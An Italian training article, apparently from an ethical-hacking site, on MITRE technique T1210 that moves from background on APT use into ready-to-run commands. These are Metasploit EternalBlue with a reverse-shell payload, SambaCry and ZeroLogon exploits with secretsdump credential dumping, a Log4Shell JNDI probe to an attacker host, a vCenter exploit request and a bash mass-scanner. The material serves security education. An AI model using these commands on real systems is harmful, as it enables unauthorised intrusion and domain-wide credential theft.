Attacco a Servizi Remoti: Exploitation of Remote Services (T1210)

L'exploitation of remote services rappresenta una delle tecniche più insidiose nel panorama delle minacce informatiche moderne. Quando un attaccante riesce a sfruttare vulnerabilità in servizi esposti in rete, ottiene spesso un accesso diretto ai sistemi interni, bypassando molte delle difese perimetrali tradizionali.

Questa tecnica appartiene alla tattica TA0008 - Lateral Movement all'interno della kill chain, posizionandosi nella fase in cui l'avversario cerca di muoversi lateralmente attraverso l'infrastruttura target. La pericolosità risiede nella capacità di trasformare un singolo punto di compromissione in un'infezione sistemica dell'intera rete aziendale.

L'impatto di questa tecnica è significativo: 11 gruppi APT documentati la utilizzano attivamente, tra cui attori sponsorizzati da stati nazionali come APT28 (Russia), Threat Group-3390 (Cina) e Dragonfly (Russia). Sono stati identificati 13 software malevoli che implementano questa capacità, da ransomware devastanti come WannaCry e NotPetya a framework modulari come TrickBot ed Empire.

Le vulnerabilità più sfruttate includono EternalBlue (MS17-010) per SMB, ZeroLogon (CVE-2020-1472) per l'escalation sui domain controller, e vulnerabilità critiche in servizi come RDP, MySQL e applicazioni web. La tecnica permette non solo il movimento laterale ma spesso anche l'escalation dei privilegi, rendendo ogni servizio esposto un potenziale vettore di compromissione totale.

Per comprendere realmente come gli attaccanti sfruttano i servizi remoti, è fondamentale replicare questi attacchi in ambiente controllato. Iniziamo con l'exploitation di SMB tramite EternalBlue, una delle vulnerabilità più devastanti degli ultimi anni.

Il comando Metasploit per verificare la vulnerabilità MS17-010 è: use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.0/24 run

Una volta identificati i sistemi vulnerabili, l'exploitation vera e propria richiede: use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set LHOST [tuo_ip] exploit

Per ambienti Linux, la vulnerabilità Samba (CVE-2017-7494) può essere testata con: python3 sambacry.py -t 192.168.1.100 -e libbindshell.so

La verifica di ZeroLogon su domain controller richiede un approccio più sofisticato. Prima testiamo la vulnerabilità: python3 zerologon_tester.py DC-NAME 192.168.1.10

Se vulnerabile, l'exploitation completa può compromettere l'intero dominio: python3 cve-2020-1472-exploit.py DC-NAME 192.168.1.10 secretsdump.py -no-pass DOMAIN/DC-NAME$@192.168.1.10

Per servizi web, l'exploitation di deserializzazione Java (come Log4Shell) inizia con la detection: curl -H 'X-Api-Version: ${jndi:ldap://[attacker_ip]/a}' http://target.com

Mentre per VMware vCenter, le vulnerabilità come CVE-2021-21985 possono essere testate: curl -k -X POST https://vcenter.target.com/ui/h5-vsan/rest/proxy/service/com.vmware.vsphere.client.h5vsan.rest.controllers.ObjectController/invokeServiceMethod -d '{"methodName":"getObjectInfo","methodParameters":[null]}'

L'automazione di questi test può essere realizzata con script personalizzati che combinano multiple tecniche. Un esempio pratico per il mass scanning di vulnerabilità note:

#!/bin/bash
# Scanner multi-vulnerabilità
targets="targets.txt"
while read -r host; do
    echo "[*] Scanning $host"
    # Test SMB
    nmap -p445 --script smb-vuln-ms17-010 $host
    # Test RDP BlueKeep
    nmap -p3389 --script rdp-vuln-cve2019-0708 $host
    # Test VMware
    curl -k -s -o /dev/null -w "%{http_code}" https://$host/ui/vropspluginui/rest/services/getstatus
done < "$targets"

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.